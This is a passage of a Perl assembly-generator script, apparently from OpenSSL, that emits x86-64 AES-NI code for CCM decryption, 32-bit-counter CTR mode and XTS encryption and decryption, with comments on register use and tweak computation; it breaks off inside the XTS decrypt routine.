$code.=<<___;
movups $inout1,($cmac)
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
.Lccm64_dec_ret:
___
$code.=<<___;
ret
.size aesni_ccm64_decrypt_blocks,.-aesni_ccm64_decrypt_blocks
___
}
######################################################################
# void aesni_ctr32_encrypt_blocks (const void *in, void *out,
# size_t blocks, const AES_KEY *key,
# const char *ivec);
#
# Handles only complete blocks, operates on 32-bit counter and
# does not update *ivec! (see engine/eng_aesni.c for details)
#
{
my $reserved = $win64?0:-0x28;
my ($in0,$in1,$in2,$in3)=map("%xmm$_",(8..11));
my ($iv0,$iv1,$ivec)=("%xmm12","%xmm13","%xmm14");
my $bswap_mask="%xmm15";
$code.=<<___;
.globl aesni_ctr32_encrypt_blocks
.type aesni_ctr32_encrypt_blocks,\@function,5
.align 16
aesni_ctr32_encrypt_blocks:
___
$code.=<<___ if ($win64);
lea -0xc8(%rsp),%rsp
movaps %xmm6,0x20(%rsp)
movaps %xmm7,0x30(%rsp)
movaps %xmm8,0x40(%rsp)
movaps %xmm9,0x50(%rsp)
movaps %xmm10,0x60(%rsp)
movaps %xmm11,0x70(%rsp)
movaps %xmm12,0x80(%rsp)
movaps %xmm13,0x90(%rsp)
movaps %xmm14,0xa0(%rsp)
movaps %xmm15,0xb0(%rsp)
.Lctr32_body:
___
$code.=<<___;
cmp \$1,$len
je .Lctr32_one_shortcut
movdqu ($ivp),$ivec
movdqa .Lbswap_mask(%rip),$bswap_mask
xor $rounds,$rounds
pextrd \$3,$ivec,$rnds_ # pull 32-bit counter
pinsrd \$3,$rounds,$ivec # wipe 32-bit counter
mov 240($key),$rounds # key->rounds
bswap $rnds_
pxor $iv0,$iv0 # vector of 3 32-bit counters
pxor $iv1,$iv1 # vector of 3 32-bit counters
pinsrd \$0,$rnds_,$iv0
lea 3($rnds_),$key_
pinsrd \$0,$key_,$iv1
inc $rnds_
pinsrd \$1,$rnds_,$iv0
inc $key_
pinsrd \$1,$key_,$iv1
inc $rnds_
pinsrd \$2,$rnds_,$iv0
inc $key_
pinsrd \$2,$key_,$iv1
movdqa $iv0,$reserved(%rsp)
pshufb $bswap_mask,$iv0
movdqa $iv1,`$reserved+0x10`(%rsp)
pshufb $bswap_mask,$iv1
pshufd \$`3<<6`,$iv0,$inout0 # place counter to upper dword
pshufd \$`2<<6`,$iv0,$inout1
pshufd \$`1<<6`,$iv0,$inout2
cmp \$6,$len
jb .Lctr32_tail
shr \$1,$rounds
mov $key,$key_ # backup $key
mov $rounds,$rnds_ # backup $rounds
sub \$6,$len
jmp .Lctr32_loop6
.align 16
.Lctr32_loop6:
pshufd \$`3<<6`,$iv1,$inout3
por $ivec,$inout0 # merge counter-less ivec
$movkey ($key_),$rndkey0
pshufd \$`2<<6`,$iv1,$inout4
por $ivec,$inout1
$movkey 16($key_),$rndkey1
pshufd \$`1<<6`,$iv1,$inout5
por $ivec,$inout2
por $ivec,$inout3
xorps $rndkey0,$inout0
por $ivec,$inout4
por $ivec,$inout5
# inline _aesni_encrypt6 and interleave last rounds
# with own code...
pxor $rndkey0,$inout1
aesenc $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
aesenc $rndkey1,$inout1
movdqa .Lincrement32(%rip),$iv1
pxor $rndkey0,$inout3
aesenc $rndkey1,$inout2
movdqa $reserved(%rsp),$iv0
pxor $rndkey0,$inout4
aesenc $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
jmp .Lctr32_enc_loop6_enter
.align 16
.Lctr32_enc_loop6:
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
dec $rounds
aesenc $rndkey1,$inout2
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
.Lctr32_enc_loop6_enter:
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
aesenc $rndkey0,$inout1
lea 32($key),$key
aesenc $rndkey0,$inout2
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lctr32_enc_loop6
aesenc $rndkey1,$inout0
paddd $iv1,$iv0 # increment counter vector
aesenc $rndkey1,$inout1
paddd `$reserved+0x10`(%rsp),$iv1
aesenc $rndkey1,$inout2
movdqa $iv0,$reserved(%rsp) # save counter vector
aesenc $rndkey1,$inout3
movdqa $iv1,`$reserved+0x10`(%rsp)
aesenc $rndkey1,$inout4
pshufb $bswap_mask,$iv0 # byte swap
aesenc $rndkey1,$inout5
pshufb $bswap_mask,$iv1
aesenclast $rndkey0,$inout0
movups ($inp),$in0 # load input
aesenclast $rndkey0,$inout1
movups 0x10($inp),$in1
aesenclast $rndkey0,$inout2
movups 0x20($inp),$in2
aesenclast $rndkey0,$inout3
movups 0x30($inp),$in3
aesenclast $rndkey0,$inout4
movups 0x40($inp),$rndkey1
aesenclast $rndkey0,$inout5
movups 0x50($inp),$rndkey0
lea 0x60($inp),$inp
xorps $inout0,$in0 # xor
pshufd \$`3<<6`,$iv0,$inout0
xorps $inout1,$in1
pshufd \$`2<<6`,$iv0,$inout1
movups $in0,($out) # store output
xorps $inout2,$in2
pshufd \$`1<<6`,$iv0,$inout2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
xorps $inout4,$rndkey1
movups $in3,0x30($out)
xorps $inout5,$rndkey0
movups $rndkey1,0x40($out)
movups $rndkey0,0x50($out)
lea 0x60($out),$out
mov $rnds_,$rounds
sub \$6,$len
jnc .Lctr32_loop6
add \$6,$len
jz .Lctr32_done
mov $key_,$key # restore $key
lea 1($rounds,$rounds),$rounds # restore original value
.Lctr32_tail:
por $ivec,$inout0
movups ($inp),$in0
cmp \$2,$len
jb .Lctr32_one
por $ivec,$inout1
movups 0x10($inp),$in1
je .Lctr32_two
pshufd \$`3<<6`,$iv1,$inout3
por $ivec,$inout2
movups 0x20($inp),$in2
cmp \$4,$len
jb .Lctr32_three
pshufd \$`2<<6`,$iv1,$inout4
por $ivec,$inout3
movups 0x30($inp),$in3
je .Lctr32_four
por $ivec,$inout4
xorps $inout5,$inout5
call _aesni_encrypt6
movups 0x40($inp),$rndkey1
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
xorps $inout4,$rndkey1
movups $in3,0x30($out)
movups $rndkey1,0x40($out)
jmp .Lctr32_done
.align 16
.Lctr32_one_shortcut:
movups ($ivp),$inout0
movups ($inp),$in0
mov 240($key),$rounds # key->rounds
.Lctr32_one:
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps $inout0,$in0
movups $in0,($out)
jmp .Lctr32_done
.align 16
.Lctr32_two:
xorps $inout2,$inout2
call _aesni_encrypt3
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
movups $in1,0x10($out)
jmp .Lctr32_done
.align 16
.Lctr32_three:
call _aesni_encrypt3
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
movups $in2,0x20($out)
jmp .Lctr32_done
.align 16
.Lctr32_four:
call _aesni_encrypt4
xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
movups $in3,0x30($out)
.Lctr32_done:
___
$code.=<<___ if ($win64);
movaps 0x20(%rsp),%xmm6
movaps 0x30(%rsp),%xmm7
movaps 0x40(%rsp),%xmm8
movaps 0x50(%rsp),%xmm9
movaps 0x60(%rsp),%xmm10
movaps 0x70(%rsp),%xmm11
movaps 0x80(%rsp),%xmm12
movaps 0x90(%rsp),%xmm13
movaps 0xa0(%rsp),%xmm14
movaps 0xb0(%rsp),%xmm15
lea 0xc8(%rsp),%rsp
.Lctr32_ret:
___
$code.=<<___;
ret
.size aesni_ctr32_encrypt_blocks,.-aesni_ctr32_encrypt_blocks
___
}
######################################################################
# void aesni_xts_[en|de]crypt(const char *inp,char *out,size_t len,
#	const AES_KEY *key1, const AES_KEY *key2,
# const unsigned char iv[16]);
#
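# (Informational note.) The 16-byte IV is first encrypted with key2 to
# produce the initial tweak; for every subsequent 16-byte block the tweak
# is multiplied by x in GF(2^128), which the code below implements with
# the pcmpgtd/pshufd/pand/paddq/pxor sequence using .Lxts_magic as the
# carry/reduction constant.
#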
{
my @tweak=map("%xmm$_",(10..15));
my ($twmask,$twres,$twtmp)=("%xmm8","%xmm9",@tweak[4]);
my ($key2,$ivp,$len_)=("%r8","%r9","%r9");
my $frame_size = 0x68 + ($win64?160:0);
$code.=<<___;
.globl aesni_xts_encrypt
.type aesni_xts_encrypt,\@function,6
.align 16
aesni_xts_encrypt:
lea -$frame_size(%rsp),%rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,0x60(%rsp)
movaps %xmm7,0x70(%rsp)
movaps %xmm8,0x80(%rsp)
movaps %xmm9,0x90(%rsp)
movaps %xmm10,0xa0(%rsp)
movaps %xmm11,0xb0(%rsp)
movaps %xmm12,0xc0(%rsp)
movaps %xmm13,0xd0(%rsp)
movaps %xmm14,0xe0(%rsp)
movaps %xmm15,0xf0(%rsp)
.Lxts_enc_body:
___
$code.=<<___;
movups ($ivp),@tweak[5] # load clear-text tweak
mov 240(%r8),$rounds # key2->rounds
mov 240($key),$rnds_ # key1->rounds
___
# generate the tweak
&aesni_generate1("enc",$key2,$rounds,@tweak[5]);
$code.=<<___;
mov $key,$key_ # backup $key
mov $rnds_,$rounds # backup $rounds
mov $len,$len_ # backup $len
and \$-16,$len
movdqa .Lxts_magic(%rip),$twmask
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
___
for ($i=0;$i<4;$i++) {
$code.=<<___;
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[$i]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,$twres # isolate carry and residue
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
pxor $twres,@tweak[5]
___
}
$code.=<<___;
sub \$16*6,$len
jc .Lxts_enc_short
shr \$1,$rounds
sub \$1,$rounds
mov $rounds,$rnds_
jmp .Lxts_enc_grandloop
.align 16
.Lxts_enc_grandloop:
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu `16*0`($inp),$inout0 # load input
pand $twmask,$twres # isolate carry and residue
movdqu `16*1`($inp),$inout1
pxor $twres,@tweak[5]
movdqu `16*2`($inp),$inout2
pxor @tweak[0],$inout0 # input^=tweak
movdqu `16*3`($inp),$inout3
pxor @tweak[1],$inout1
movdqu `16*4`($inp),$inout4
pxor @tweak[2],$inout2
movdqu `16*5`($inp),$inout5
lea `16*6`($inp),$inp
pxor @tweak[3],$inout3
$movkey ($key_),$rndkey0
pxor @tweak[4],$inout4
pxor @tweak[5],$inout5
# inline _aesni_encrypt6 and interleave first and last rounds
# with own code...
$movkey 16($key_),$rndkey1
pxor $rndkey0,$inout0
pxor $rndkey0,$inout1
movdqa @tweak[0],`16*0`(%rsp) # put aside tweaks
aesenc $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
movdqa @tweak[1],`16*1`(%rsp)
aesenc $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqa @tweak[2],`16*2`(%rsp)
aesenc $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqa @tweak[3],`16*3`(%rsp)
aesenc $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
movdqa @tweak[4],`16*4`(%rsp)
aesenc $rndkey1,$inout4
movdqa @tweak[5],`16*5`(%rsp)
aesenc $rndkey1,$inout5
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp
jmp .Lxts_enc_loop6_enter
.align 16
.Lxts_enc_loop6:
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
dec $rounds
aesenc $rndkey1,$inout2
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
.Lxts_enc_loop6_enter:
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
aesenc $rndkey0,$inout1
lea 32($key),$key
aesenc $rndkey0,$inout2
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lxts_enc_loop6
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
aesenc $rndkey1,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
$movkey 16($key),$rndkey1
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey0,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesenc $rndkey0,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey 32($key),$rndkey0
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[1]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey1,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesenc $rndkey1,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[2]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenclast $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesenclast $rndkey0,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesenclast $rndkey0,$inout2
pxor $twres,@tweak[5]
aesenclast $rndkey0,$inout3
aesenclast $rndkey0,$inout4
aesenclast $rndkey0,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[3]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
xorps `16*0`(%rsp),$inout0 # output^=tweak
pand $twmask,$twres # isolate carry and residue
xorps `16*1`(%rsp),$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
pxor $twres,@tweak[5]
xorps `16*2`(%rsp),$inout2
movups $inout0,`16*0`($out) # write output
xorps `16*3`(%rsp),$inout3
movups $inout1,`16*1`($out)
xorps `16*4`(%rsp),$inout4
movups $inout2,`16*2`($out)
xorps `16*5`(%rsp),$inout5
movups $inout3,`16*3`($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,`16*4`($out)
movups $inout5,`16*5`($out)
lea `16*6`($out),$out
sub \$16*6,$len
jnc .Lxts_enc_grandloop
lea 3($rounds,$rounds),$rounds # restore original value
mov $key_,$key # restore $key
mov $rounds,$rnds_ # backup $rounds
.Lxts_enc_short:
add \$16*6,$len
jz .Lxts_enc_done
cmp \$0x20,$len
jb .Lxts_enc_one
je .Lxts_enc_two
cmp \$0x40,$len
jb .Lxts_enc_three
je .Lxts_enc_four
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movdqu 16*1($inp),$inout1
pxor $twres,@tweak[5]
movdqu 16*2($inp),$inout2
pxor @tweak[0],$inout0
movdqu 16*3($inp),$inout3
pxor @tweak[1],$inout1
movdqu 16*4($inp),$inout4
lea 16*5($inp),$inp
pxor @tweak[2],$inout2
pxor @tweak[3],$inout3
pxor @tweak[4],$inout4
call _aesni_encrypt6
xorps @tweak[0],$inout0
movdqa @tweak[5],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movdqu $inout0,($out)
xorps @tweak[3],$inout3
movdqu $inout1,16*1($out)
xorps @tweak[4],$inout4
movdqu $inout2,16*2($out)
movdqu $inout3,16*3($out)
movdqu $inout4,16*4($out)
lea 16*5($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_one:
movups ($inp),$inout0
lea 16*1($inp),$inp
xorps @tweak[0],$inout0
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movdqa @tweak[1],@tweak[0]
movups $inout0,($out)
lea 16*1($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_two:
movups ($inp),$inout0
movups 16($inp),$inout1
lea 32($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
call _aesni_encrypt3
xorps @tweak[0],$inout0
movdqa @tweak[2],@tweak[0]
xorps @tweak[1],$inout1
movups $inout0,($out)
movups $inout1,16*1($out)
lea 16*2($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_three:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
lea 16*3($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
call _aesni_encrypt3
xorps @tweak[0],$inout0
movdqa @tweak[3],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movups $inout0,($out)
movups $inout1,16*1($out)
movups $inout2,16*2($out)
lea 16*3($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_four:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
xorps @tweak[0],$inout0
movups 16*3($inp),$inout3
lea 16*4($inp),$inp
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
xorps @tweak[3],$inout3
call _aesni_encrypt4
xorps @tweak[0],$inout0
movdqa @tweak[5],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movups $inout0,($out)
xorps @tweak[3],$inout3
movups $inout1,16*1($out)
movups $inout2,16*2($out)
movups $inout3,16*3($out)
lea 16*4($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_done:
and \$15,$len_
jz .Lxts_enc_ret
mov $len_,$len
.Lxts_enc_steal:
movzb ($inp),%eax # borrow $rounds ...
movzb -16($out),%ecx # ... and $key
lea 1($inp),$inp
mov %al,-16($out)
mov %cl,0($out)
lea 1($out),$out
sub \$1,$len
jnz .Lxts_enc_steal
sub $len_,$out # rewind $out
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups -16($out),$inout0
xorps @tweak[0],$inout0
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movups $inout0,-16($out)
.Lxts_enc_ret:
___
$code.=<<___ if ($win64);
movaps 0x60(%rsp),%xmm6
movaps 0x70(%rsp),%xmm7
movaps 0x80(%rsp),%xmm8
movaps 0x90(%rsp),%xmm9
movaps 0xa0(%rsp),%xmm10
movaps 0xb0(%rsp),%xmm11
movaps 0xc0(%rsp),%xmm12
movaps 0xd0(%rsp),%xmm13
movaps 0xe0(%rsp),%xmm14
movaps 0xf0(%rsp),%xmm15
___
$code.=<<___;
lea $frame_size(%rsp),%rsp
.Lxts_enc_epilogue:
ret
.size aesni_xts_encrypt,.-aesni_xts_encrypt
___
$code.=<<___;
.globl aesni_xts_decrypt
.type aesni_xts_decrypt,\@function,6
.align 16
aesni_xts_decrypt:
lea -$frame_size(%rsp),%rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,0x60(%rsp)
movaps %xmm7,0x70(%rsp)
movaps %xmm8,0x80(%rsp)
movaps %xmm9,0x90(%rsp)
movaps %xmm10,0xa0(%rsp)
movaps %xmm11,0xb0(%rsp)
movaps %xmm12,0xc0(%rsp)
movaps %xmm13,0xd0(%rsp)
movaps %xmm14,0xe0(%rsp)
movaps %xmm15,0xf0(%rsp)
.Lxts_dec_body:
___
$code.=<<___;
movups ($ivp),@tweak[5] # load clear-text tweak
mov 240($key2),$rounds # key2->rounds
mov 240($key),$rnds_ # key1->rounds
___
# generate the tweak
&aesni_generate1("enc",$key2,$rounds,@tweak[5]);
$code.=<<___;
xor %eax,%eax # if ($len%16) len-=16;
test \$15,$len
setnz %al
shl \$4,%rax
sub %rax,$len
mov $key,$key_ # backup $key
mov $rnds_,$rounds # backup $rounds
mov $len,$len_ # backup $len
and \$-16,$len
movdqa .Lxts_magic(%rip),$twmask
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
___
for ($i=0;$i<4;$i++) {
$code.=<<___;
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[$i]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,$twres # isolate carry and residue
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
pxor $twres,@tweak[5]
___
}
$code.=<<___;
sub \$16*6,$len
jc .Lxts_dec_short
shr \$1,$rounds
sub \$1,$rounds
mov $rounds,$rnds_
jmp .Lxts_dec_grandloop
.align 16
.Lxts_dec_grandloop:
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu `16*0`($inp),$inout0 # load input
pand $twmask,$twres # isolate carry and residue
movdqu `16*1`($inp),$inout1
pxor $twres,@tweak[5]
movdqu `16*2`($inp),$inout2
pxor @tweak[0],$inout0 # input^=tweak
movdqu `16*3`($inp),$inout3
pxor @tweak[1],$inout1
movdqu `16*4`($inp),$inout4
pxor @tweak[2],$inout2
movdqu `16*5`($inp),$inout5
lea `16*6`($inp),$inp
pxor @tweak[3],$inout3
$movkey ($key_),$rndkey0
pxor @tweak[4],$inout4
pxor @tweak[5],$inout5
# inline _aesni_decrypt6 and interleave first and last rounds
# with own code...
$movkey 16($key_),$rndkey1
pxor $rndkey0,$inout0
pxor $rndkey0,$inout1
movdqa @tweak[0],`16*0`(%rsp) # put aside tweaks
aesdec $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
movdqa @tweak[1],`16*1`(%rsp)
aesdec $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqa @tweak[2],`16*2`(%rsp)
aesdec $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqa @tweak[3],`16*3`(%rsp)
aesdec $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
movdqa @tweak[4],`16*4`(%rsp)
aesdec $rndkey1,$inout4
movdqa @tweak[5],`16*5`(%rsp)
aesdec $rndkey1,$inout5
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp
jmp .Lxts_dec_loop6_enter
.align 16
.Lxts_dec_loop6:
aesdec $rndkey1,$inout0
aesdec $rndkey1,$inout1
dec $rounds
aesdec $rndkey1,$inout2
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
.Lxts_dec_loop6_enter:
$movkey 16($key),$rndkey1
aesdec $rndkey0,$inout0
aesdec $rndkey0,$inout1
lea 32($key),$key
aesdec $rndkey0,$inout2
aesdec $rndkey0,$inout3
aesdec $rndkey0,$inout4
aesdec $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lxts_dec_loop6
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
aesdec $rndkey1,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
$movkey 16($key),$rndkey1
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey0,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesdec $rndkey0,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey0,$inout3
aesdec $rndkey0,$inout4
aesdec $rndkey0,$inout5
$movkey 32($key),$rndkey0
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[1]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey1,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesdec $rndkey1,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[2]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdeclast $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesdeclast $rndkey0,$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
aesdeclast $rndkey0,$inout2
pxor $twres,@tweak[5]
aesdeclast $rndkey0,$inout3
aesdeclast $rndkey0,$inout4
aesdeclast $rndkey0,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[3]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
xorps `16*0`(%rsp),$inout0 # output^=tweak
pand $twmask,$twres # isolate carry and residue
xorps `16*1`(%rsp),$inout1
	pcmpgtd	@tweak[5],$twtmp	# broadcast upper bits
pxor $twres,@tweak[5]
xorps `16*2`(%rsp),$inout2
movups $inout0,`16*0`($out) # write output
xorps `16*3`(%rsp),$inout3
movups $inout1,`16*1`($out)
xorps `16*4`(%rsp),$inout4
movups $inout2,`16*2`($out)
xorps `16*5`(%rsp),$inout5
movups $inout3,`16*3`($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,`16*4`($out)
movups $inout5,`16*5`($out)
lea `16*6`($out),$out
sub \$16*6,$len
jnc .Lxts_dec_grandloop
lea 3($rounds,$rounds),$rounds # restore original value
mov $key_,$key # restore $key
mov $rounds,$rnds_ # backup $rounds
.Lxts_dec_short:
add \$16*6,$len
jz .Lxts_dec_done
cmp \$0x20,$len
jb .Lxts_dec_one
je .Lxts_dec_two
cmp \$0x40,$len
jb .Lxts_dec_three
je .Lxts_dec_four
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movdqu 16*1($inp),$inout1
pxor $twres,@tweak[5]
movdqu 16*2($inp),$inout2
pxor @tweak[0],$inout0
movdqu 16*3($inp),$inout3
pxor @tweak[1],$inout1
movdqu 16*4($inp),$inout4
lea 16*5($inp),$inp
pxor @tweak[2],$inout2
pxor @tweak[3],$inout3
pxor @tweak[4],$inout4
call _aesni_decrypt6
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movdqu $inout0,($out)
xorps @tweak[3],$inout3
movdqu $inout1,16*1($out)
xorps @tweak[4],$inout4
movdqu $inout2,16*2($out)
pxor $twtmp,$twtmp
movdqu $inout3,16*3($out)
pcmpgtd @tweak[5],$twtmp
movdqu $inout4,16*4($out)
lea 16*5($out),$out
pshufd \$0x13,$twtmp,@tweak[1] # $twres
and \$15,$len_
jz .Lxts_dec_ret
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,@tweak[1] # isolate carry and residue
pxor @tweak[5],@tweak[1]
jmp .Lxts_dec_done2
.align 16
.Lxts_dec_one:
movups ($inp),$inout0
lea 16*1($inp),$inp
xorps @tweak[0],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movdqa @tweak[1],@tweak[0]
movups $inout0,($out)
movdqa @tweak[2],@tweak[1]
lea 16*1($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_two:
movups ($inp),$inout0
movups 16($inp),$inout1
lea 32($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
call _aesni_decrypt3
xorps @tweak[0],$inout0
movdqa @tweak[2],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[3],@tweak[1]
movups $inout0,($out)
movups $inout1,16*1($out)
lea 16*2($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_three:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
lea 16*3($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
call _aesni_decrypt3
xorps @tweak[0],$inout0
movdqa @tweak[3],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[5],@tweak[1]
xorps @tweak[2],$inout2
movups $inout0,($out)
movups $inout1,16*1($out)
movups $inout2,16*2($out)
lea 16*3($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_four:
